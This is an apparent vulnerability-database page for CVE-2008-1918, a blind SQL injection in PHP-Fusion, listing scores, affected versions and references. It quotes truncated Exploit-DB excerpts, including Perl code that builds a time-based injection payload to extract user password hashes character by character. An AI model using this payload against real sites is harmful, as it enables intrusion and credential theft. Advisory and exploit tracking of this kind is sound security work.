CVE-2008-1918
published 2008-04-23CVE-2008-1918: SQL injection vulnerability in submit.php in PHP-Fusion 6.01.14 and 6.00.307, when magic_quotes_gpc is disabled and the database table prefix is known, allows…
PriorityP433medium6CVSS 2.0
AVNACMAuSCPIPAP
EXPLOIT
EPSS
1.49%
70.8th percentile
SQL injection vulnerability in submit.php in PHP-Fusion 6.01.14 and 6.00.307, when magic_quotes_gpc is disabled and the database table prefix is known, allows remote authenticated users to execute arbitrary SQL commands via the submit_info[] parameter in a link submission action. NOTE: it was later reported that 7.00.2 is also affected.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| php-fusion | php-fusion | — | — |
| php-fusion | php-fusion | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
PHP-Fusion 7.0.2 - Blind SQL Injection
exploitdb·2008-12-24
CVE-2008-1918 PHP-Fusion 7.0.2 - Blind SQL Injection
PHP-Fusion 7.0.2 - Blind SQL Injection
---
#!/usr/bin/perl -w
# -------------------------------------------------------
# PHP-Fusion default_header('Cookie' => "fusion_user=${ulogin}.".md5_hex($plogin));
$post = $http->post('http://'.$host,[
'link_category' => 1,
'link_name' => 1,
'link_url' => 1,
'link_description' => 1,
'submit_link' => 'Submit+Link',
'submit_info[pwn]' => $param,
]);
}
sub give_char
{
my $send = undef;
my ($charz,$uidz) = @_;
$send = "' or (select if((ascii(substring".
"($field,$uidz,1))=$charz),".
"benchmark(230000000,char(0)),".
"0) from ${ptable}_users where user_id=$userid))#";
return $send;
}
for(1..32)
{
foreach my $set(@chars)
{
my $start = time();
send_request(give_char($set,$substr));
my $stop = time();
if($stop - $start > 6)
{
syswrite(STDOUT,chr($
Exploit-DB
PHP-Fusion 6.01.14 - Blind SQL Injection
exploitdb·2008-04-19
CVE-2008-1918 PHP-Fusion 6.01.14 - Blind SQL Injection
PHP-Fusion 6.01.14 - Blind SQL Injection
---
#!/usr/bin/python
"""
#=================================================================================================#
# ____ __________ __ ____ __ #
# /_ | ____ |__\_____ \ _____/ |_ /_ |/ |_ #
# | |/ \ | | _(__ __| |___||__| #
# \/\______| \/ \/ #
#=================================================================================================#
# This was a priv8 Exploit #
#=================================================================================================#
# PHP-Fusion 6.00.307 #
# And Probably All Other Versions #
# Blind Sql Injection Vulnerability #
# Benchmark Method #
#====================================#===========#====================================#===========#
# Server Configuration Requirements # # Some Informa
No writeups or analysis indexed.
http://osvdb.org/51052http://secunia.com/advisories/29930http://secunia.com/advisories/33295http://www.php-fusion.co.uk/news.phphttp://www.securityfocus.com/bid/28855http://www.vupen.com/english/advisories/2008/1318/referenceshttps://exchange.xforce.ibmcloud.com/vulnerabilities/41914https://exchange.xforce.ibmcloud.com/vulnerabilities/47610https://www.exploit-db.com/exploits/5470https://www.exploit-db.com/exploits/7576http://osvdb.org/51052http://secunia.com/advisories/29930http://secunia.com/advisories/33295http://www.php-fusion.co.uk/news.phphttp://www.securityfocus.com/bid/28855http://www.vupen.com/english/advisories/2008/1318/referenceshttps://exchange.xforce.ibmcloud.com/vulnerabilities/41914https://exchange.xforce.ibmcloud.com/vulnerabilities/47610https://www.exploit-db.com/exploits/5470https://www.exploit-db.com/exploits/7576
2008-04-23
Published